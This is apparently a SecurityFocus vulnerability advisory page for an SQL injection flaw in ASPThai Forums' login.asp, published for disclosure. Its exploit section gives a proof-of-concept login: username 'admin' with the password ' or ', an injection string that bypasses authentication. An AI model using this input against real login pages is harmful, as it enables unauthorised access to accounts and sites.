info
discussion
exploit
solution
references
ASPThai Forums Login.ASP SQL Injection Vulnerability
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/[Forum target]/login.asp
username: admin
password: ' or '
Privacy Statement
Copyright 2010, SecurityFocus
